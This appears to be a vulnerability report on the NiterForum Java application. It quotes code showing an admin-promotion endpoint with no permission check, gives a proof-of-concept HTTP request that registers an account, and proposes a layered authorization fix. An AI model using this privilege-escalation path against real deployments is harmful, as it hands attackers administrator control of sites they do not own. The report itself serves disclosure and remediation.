Vulnerability Details

Any registered user

code: /NiterForum/src/main/java/cn/niter/forum/api/SsoApi.java row68-83:

```java
@ResponseBody // @ResponseBody returns the data in JSON format
@RequestMapping(value = "/register", method = RequestMethod.POST)
public Object register(HttpServletRequest request,
                       @RequestParam("name") String name,
                       @RequestParam("password") String password,
                       @RequestParam("type") Integer type,
                       HttpServletResponse response) {
    // 1 = phone number, 2 = email address
    ResultDTO resultDTO = (ResultDTO) userService.register(type, name, password);
    if (200 == resultDTO.getCode()) {
        Cookie cookie = cookieUtils.getCookie("token", "" + resultDTO.getData(), 86400 * 3);
        response.addCookie(cookie);
    }
    return resultDTO;
}
```

Any user can add users through this interface.

return:

```
{"typ":"JWT","alg":"HS256"}{"vipRank":0,"avatarUrl":"/images/avatar/8.jpg","groupId":1,"iss":"NiterUser","name":"邮箱用户_h5ith","id":776,"exp":1661850834}
```

Query database, successfully added:

Add administrator without authority

at NiterForum/src/main/java/cn/niter/forum/controller/AdminController.java row 113-136:

```java
@PostMapping("/user2588/setAdmin/id")
@ResponseBody
public Map<String, Object> setQuestionById(HttpServletRequest request,
                                           @RequestParam(name = "id", defaultValue = "0") Long id) {
    UserDTO user = (UserDTO) request.getAttribute("loginUser");
    //UserAccount userAccount = (UserAccount) request.getSession().getAttribute("userAccount");
    if (user == null) {
        throw new CustomizeException(CustomizeErrorCode.NO_LOGIN);
    }
    Map<String, Object> map = new HashMap<>();
    UserAccount userAccount = new UserAccount();
    userAccount.setGroupId(19);
    UserAccountExample userAccountExample = new UserAccountExample();
    userAccountExample.createCriteria().andUserIdEqualTo(id);
    if (userAccountMapper.updateByExampleSelective(userAccount, userAccountExample) == 1) {
        map.put("code", 200);
        map.put("message", "恭喜您,设置成功!");
    }
    return map;
}
```

This interface does not perform permission verification, and any user can access it after logging in.

POC:

Any registered user

```http
POST /api/sso/register HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/sso/register
Cookie:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

name=[email protected]&password=123456&type=2
```
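One way to close the authorization gap in the setAdmin handler, as an added example that is not part of this issue or of the NiterForum code base: the handler itself checks the caller's group before touching the database, and a Spring `HandlerInterceptor` applies the same check to every route under `/user2588/`, so one forgotten check in some other admin action cannot expose it. `ADMIN_GROUP_ID = 19` is inferred from `userAccount.setGroupId(19)` in the vulnerable code; `UserDTO.getGroupId()`, `UserDTO.getId()`, `CustomizeErrorCode.NO_PERMISSION`, constructor injection of `UserAccountMapper`, and a login filter that sets the `loginUser` request attribute before interceptors run are all assumptions about the project, not facts taken from it.

```java
import java.util.HashMap;
import java.util.Map;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.context.annotation.Configuration;
import org.springframework.stereotype.Component;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

/** Shared check. ADMIN_GROUP_ID = 19 is inferred from userAccount.setGroupId(19) in the report. */
final class AdminAuthz {
    static final int ADMIN_GROUP_ID = 19;

    /** True only if a logged-in UserDTO is attached and is in the admin group (UserDTO.getGroupId() assumed). */
    static boolean isAdmin(HttpServletRequest request) {
        Object attr = request.getAttribute("loginUser");
        if (!(attr instanceof UserDTO)) {
            return false;
        }
        Integer groupId = ((UserDTO) attr).getGroupId();
        return groupId != null && groupId == ADMIN_GROUP_ID;
    }
}

/** Route-level guard: every request under /user2588/ must come from an admin, whatever the handler does. */
@Component
class AdminPathInterceptor implements HandlerInterceptor {
    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler)
            throws Exception {
        if (AdminAuthz.isAdmin(request)) {
            return true;
        }
        response.sendError(HttpServletResponse.SC_FORBIDDEN); // 403: session may be valid, privilege is missing
        return false;
    }
}

/** Registers the guard; it relies on the login filter (assumed) having already set "loginUser". */
@Configuration
class AdminPathConfig implements WebMvcConfigurer {
    private final AdminPathInterceptor interceptor;

    AdminPathConfig(AdminPathInterceptor interceptor) {
        this.interceptor = interceptor;
    }

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(interceptor).addPathPatterns("/user2588/**");
    }
}

/** Hardened handler: the in-method check stays so the endpoint is safe even if remapped outside /user2588/. */
@RestController
class HardenedAdminController {
    private static final Logger log = LoggerFactory.getLogger(HardenedAdminController.class);
    private final UserAccountMapper userAccountMapper; // project mapper, injected as in the original controller

    HardenedAdminController(UserAccountMapper userAccountMapper) {
        this.userAccountMapper = userAccountMapper;
    }

    @PostMapping("/user2588/setAdmin/id")
    public Map<String, Object> setAdminById(HttpServletRequest request, @RequestParam("id") Long id) {
        UserDTO user = (UserDTO) request.getAttribute("loginUser");
        if (user == null) {
            throw new CustomizeException(CustomizeErrorCode.NO_LOGIN);
        }
        if (!AdminAuthz.isAdmin(request)) {
            // NO_PERMISSION is a hypothetical enum value; use the project's own "forbidden" code.
            throw new CustomizeException(CustomizeErrorCode.NO_PERMISSION);
        }
        Map<String, Object> map = new HashMap<>();
        if (id == null || id <= 0) { // no defaultValue = "0": a missing id is a client error, not an update of user 0
            map.put("code", 400);
            map.put("message", "invalid user id");
            return map;
        }
        UserAccount userAccount = new UserAccount();
        userAccount.setGroupId(AdminAuthz.ADMIN_GROUP_ID);
        UserAccountExample example = new UserAccountExample();
        example.createCriteria().andUserIdEqualTo(id);
        if (userAccountMapper.updateByExampleSelective(userAccount, example) == 1) {
            log.info("admin promotion: actor={} target={}", user.getId(), id); // rare, high-impact: alert on this
            map.put("code", 200);
            map.put("message", "恭喜您,设置成功!");
        }
        return map;
    }
}
```

The two layers are deliberate: the interceptor makes the default for `/user2588/**` "deny unless admin", and the in-method check keeps the endpoint safe if it is ever remapped or called from another code path. Open self-registration on `/api/sso/register` is normal for a forum; what turned it into a full takeover here was that any freshly registered account (`groupId: 1` in the returned token) could call the unguarded promotion endpoint. After the fix, a promotion attempt by a non-admin shows up as a 403 on `/user2588/setAdmin/id`, and every successful promotion leaves an `admin promotion` log line naming actor and target, both of which are worth alerting on.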